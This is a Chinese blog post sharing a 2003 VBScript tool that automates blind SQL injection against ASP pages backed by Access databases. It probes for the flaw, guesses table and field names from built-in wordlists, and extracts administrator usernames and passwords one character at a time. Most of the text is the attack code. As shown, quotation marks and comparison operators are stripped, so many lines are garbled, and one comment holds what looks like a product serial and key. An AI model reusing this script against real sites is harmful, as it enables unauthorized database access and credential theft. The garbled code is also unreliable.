这个脚本写于2003年,终于能收到我自己的博客里了。如今这样的注入漏洞已经很少了,一是纯asp的站越来越少,二是成熟的站点多见,一些漏洞都被补得差不多了,此脚本可以封存起来了。。。^_^
' sql注入之脚本篇-for access数据库 by 晴阳(liuxy)
'==========================================================================
'通过脚本对因过滤字符不严的asp页面进行自动攻击,能自动猜测常用表名,字段名和用户,密码
'经修改也能猜测其他不常见的表名,字段名和用户,密码,不过速度不会很快
'1->.攻击前检测是否存在漏洞。若url=http://ip/list.asp?id=1则可构造这样的url来检测
'http://ip/list.asp?id=1 http://ip/list.asp?id=1 and 1=1 http://ip/list.asp?id=1 and 1=0
'若两种情况与返回的正文不一致,则表明一定存在sql注入漏洞~~~恭喜恭喜!
'2->.检测表名 通过提交http://ip/list.asp?id=1 and exists (select * from ptable)来检测是否存在表ptable
'3->.检测字段名 通过提交http://ip/list.asp?id=1 and 0(select count(pfield) from ptable)
'4->.检测用户和密码 http://ip/list.asp?id=1 and exists (select * from tablename where user'1') 这里的user为常用字段
'http://ip/list.asp?id=1 and exists (select * from tablename where user=puser and len(pwd)>?)
'http://ip/list.asp?id=1 and exists (select * from tablename where user=username and asc(mid(pwd,i))>?)
dim url,bodytext,ptable,pfield,passtable,passuser,passpass,puser,puserlen,ppwd,ppwdlen,pcheck,pnum
dim checklen1,checklen2
dim lennumok
dim errortable
errortable=注入不成功!
dim tablefind()
redim preserve tablefind(0)
tablefind(0)=
dim fieldfind()
redim preserve fieldfind(0)
fieldfind(0)=
dim table(3)
table(0)=admin
table(1)=user
table(2)=login
table(3)=news
dim field(11)
field(0)=name
field(1)=user
field(2)=username
field(3)=pwd
field(4)=pass
field(5)=passwd
field(6)=password
field(7)=id
field(8)=title
field(9)=body
field(10)=topic
field(11)=board
function urlencoding(vstrin) 'url编码函数
strreturn =
for i = 1 to len(vstrin)
thischr = mid(vstrin,i,1)
if abs(asc(thischr)) strreturn = strreturn & thischr
else
innercode = asc(thischr)
if innercode innercode = innercode + &h10000
end if
hight8 = (innercode and &hff00)\ &hff
low8 = innercode and &hff
strreturn = strreturn & % & hex(hight8) & % & hex(low8)
end if
next
urlencoding = strreturn
end function
function bytes2bstr(vin) '用于解决无法正常显示汉字问题
strreturn =
for i = 1 to lenb(vin)
thischarcode = ascb(midb(vin,i,1))
if thischarcode strreturn = strreturn & chr(thischarcode)
else
nextcharcode = ascb(midb(vin,i+1,1))
strreturn = strreturn & chr(clng(thischarcode) * &h100 + cint(nextcharcode))
i = i + 1
end if
next
bytes2bstr = strreturn
end function
'增加数组长度
function addlength(idfind,find)
lennum=ubound(idfind)
redim preserve idfind(lennum+1)
idfind(lennum)=find
idfind(lennum+1)=
end function
'输入待测试的网址
wscript.echo chr(10)&========access数据库注入脚本(晴阳/liuxy)========
url=inputbox(请输入可能存在漏洞的网址:&chr(10)&chr(10)&形如http://localhost/sql/index.asp?id=1,,http://www.dttt.com/showdown.asp?id=83)
'bodytext=inputbox(请输入正常返回的地址:&chr(10)&chr(10)&这里输入正常返回时的正文&chr(10)&chr(10)&(取与错误页面中没有的部分),,sn: z9j8-pum4n-c6gzq key: rw2-7jw)
wscript.echo chr(10)&正在检查&url&注入漏洞...
url=urlencoding(url)
pchecksqlres=pchecksql(url)
if pchecksqlres=false then
wscript.echo chr(10)&========&url&无注入漏洞.退出!========
wscript.quit
else
wscript.echo chr(10)&========存在漏洞,开始注入!========
call runinjection()
end if
'注入部分
function runinjection()
dim checkok
'依次猜测数组table()中的表名
wscript.echo chr(10)& ┌───开始猜测表名&chr(10)& │
if pchecktable(url,errortable)=true then
wscript.echo ├───&errortable&chr(10)& │
wscript.echo └───表名猜测完毕!&chr(10)
wscript.echo chr(10)&========access数据库注入脚本(晴阳/liuxy)========
exit function
end if
for i=0 to ubound(table) step 1
if pchecktable(url,table(i))=true then
checkok=true
call addlength(tablefind,table(i))
wscript.echo ├───找到表&table(i)&chr(10)& │
else checkok=false
end if
if checkok=true then
wscript.echo │ ├───表&table(i)&字段名&chr(10)& │
for j=0 to ubound(field) step 1
if pcheckfield(url,table(i),field(j))=true then
wscript.echo │ ├───&field(j)
end if
next
end if
next
wscript.echo └───表名猜测完毕!&chr(10)
for i=0 to ubound(tablefind) step 1
if tablefind(i)=admin then
ptablefind=true
exit for
end if
next
if ptablefind=true then
wscript.echo ========开始查找表中用户密码========
'输入需要检测字段长度的表名,字段名
plentable=inputbox(输入用户字段名:,脚本参数-表名,admin)
plenuser=inputbox(输入用户字段名:,脚本参数-用户字段名,user)
plenpass=inputbox(输入密码字段名:,脚本参数-密码字段名,pwd)
call pchecklen1(url,plentable,plenuser,1,1,0,30)
wscript.echo 表&plentable&字段&plenuser&中存在一个内容长为:&pcheck
for i=1 to pcheck step 1
call pchecklen1(url,plentable,plenuser,2,cstr(i),32,127)
puser=puser+chr(pcheck)
wscript.echo 查找用户&puser&......
next
wscript.echo 表&plentable&字段&plenuser&中存在一个内容:&puser
wscript.echo ========开始查找用户&puser&的密码:========
call pchecklen1(url,plentable,plenpass,1,1,0,32)
wscript.echo 表&plentable&字段&plenpass&中存在一个内容长为:&pcheck
for i=1 to pcheck step 1
call pchecklen1(url,plentable,plenpass,2,cstr(i),32,127)
ppwd=ppwd+chr(pcheck)
wscript.echo 用户&puser&的密码&ppwd&......
next
wscript.echo 表&plentable&字段&plenpass&中存在一个内容:&ppwd
end if
wscript.echo chr(10)&========access数据库注入脚本(晴阳/liuxy)========
end function
'主要部分,做入侵检测用的代码 ,构造入侵用url
'============================================================
function ppost(purl)
on error resume next
set pres = createobject(microsoft.xmlhttp)
pres.open post,purl,false
pres.send
'获取页面返回信息返回的正文中存在bodytext的话就表示猜测成功
pret=bytes2bstr(pres.responsebody)
if instr(pret, bodytext) > 0 then
ppost=true
else
ppost=false
end if
set pres = nothing
end function
'============================================================
function prettext(purl)
on error resume next
set pres=createobject(microsoft.xmlhttp)
pres.open post,purl,false
pres.send
prettext=bytes2bstr(pres.responsebody)
set pres=nothing
end function
'检测是否存在注入漏洞
function pchecksql(purl)
dim continuefind,bodytext1,bodytext2
bodytext1=
bodytext2=
dim pchecksql1,pchecksql2,pchecksql3
pchecksql1=prettext(purl)
pchecksql2=prettext(purl+ and 1=1)
pchecksql3=prettext(purl+ and 1=0)
for i=1 to len(pchecksql1) step 1
if mid(pchecksql1,i,1)=mid(pchecksql2,i,1) then
bodytext1=bodytext1+mid(pchecksql1,i,1)
else
exit for
end if
next
for j=1 to len(pchecksql3) step 1
if mid(pchecksql3,i,1)=mid(pchecksql2,i,1) then
bodytext2=bodytext2+mid(pchecksql3,i,1)
else
exit for
end if
next
if bodytext1bodytext2 then
pchecksql=true
bodytext=bodytext1
'msgbox 存在注入漏洞!
else
pchecksql=false
'msgbox 无漏洞,退出!
end if
end function
'=============================================================
'检测常用表名
function pchecktable(purl,ptable)
checktable=ppost(purl+ and exists (select * from +ptable+))
if checktable=true then
pchecktable=true
end if
end function
'检测常用字段名
function pcheckfield(purl,ptable,pfield)
checkfield=ppost(purl+ and 0(select count(+pfield+) from +ptable+))
if checkfield=true then
pcheckfield=true
end if
end function
function pchecklen1(purl,ptable,pfield,pcheckstyle,pnum,m,n) '用来检测pfield的长度和内容
if pcheckstyle=1 then pcheckstr=len(+pfield+)
if pcheckstyle=2 then pcheckstr=asc(mid(+pfield+,+pnum+,1))
if ppost(purl+ and exists (select top 1 * from +ptable+ where +pcheckstr++n+))=true then
wscript.echo pfield1&中没有找到内容!
end if
if ppost(purl+ and exists (select top 1 * from +ptable+ where +pcheckstr+=+m+))=true then pcheck=cint(m):exit function
if ppost(purl+ and exists (select top 1 * from +ptable+ where +pcheckstr+=+n+))=true then pcheck=cint(n):exit function
mn=cstr((cint(n)+cint(m))/2)
if ppost(purl+ and exists (select top 1 * from +ptable+ where +pcheckstr+>+m+ and +pcheckstr+ 'wscript.echo purl+ and exists (select top 1 * from +ptable+ where +pcheckstr+>+m+ and +pcheckstr+ call pchecklen1(purl,ptable,pfield,pcheckstyle,pnum,m,mn)
else
call pchecklen1(purl,ptable,pfield,pcheckstyle,pnum,mn,n)
end if
end function